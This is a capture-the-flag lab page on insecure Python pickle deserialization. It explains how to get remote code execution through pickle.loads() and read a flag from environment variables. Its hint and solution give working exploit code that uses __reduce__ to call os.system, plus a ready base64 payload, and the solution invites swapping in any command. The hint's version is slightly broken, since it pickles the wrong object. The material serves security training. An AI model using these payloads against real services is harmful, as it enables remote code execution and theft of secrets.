Python3

Insecure deserialization - Python pickle

by Brumens

drag_indicator

info

drag_indicator

inputs

drag_indicator

inspect

Insecure deserialization - Python pickle

Exploit the insecure deserialization process made by the function pickle.loads() to archive a remote code execution (RCE) on the target system. Use the RCE to extract the flag which is located in the system enviroment variables.

Be aware

~ The second hint gives the exploitation code to create serialized payloads that can execute system commands on the target

Hints

Hint #1

expand_more

You can read how python pickle do work at the official python pickle documentation.

Hint #2

expand_more

import os, pickle, base64
def Exploit():
    class rce:
        def __reduce__(self):
            return os.system, (('id'),)
payload = base64.urlsafe_b64encode( pickle.dumps( Exploit() ))
print(payload)

Solution

Read the solution

expand_more

Exploit code :

import os, pickle, base64
class Exploit:
    def __reduce__(self):
        return os.system, ('env | grep -i flag',)

payload = base64.urlsafe_b64encode( pickle.dumps( Exploit() )).decode('utf-8')
print(payload)

This exploit code return the payload : Feel free to replace the env | grep -i flag with any system command

gASVLQAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBJlbnYgfCBncmVwIC1pIGZsYWeUhZRSlC4=

drag_indicator

waf

INPUT

OUTPUT

drag_indicator

code

drag_indicator

result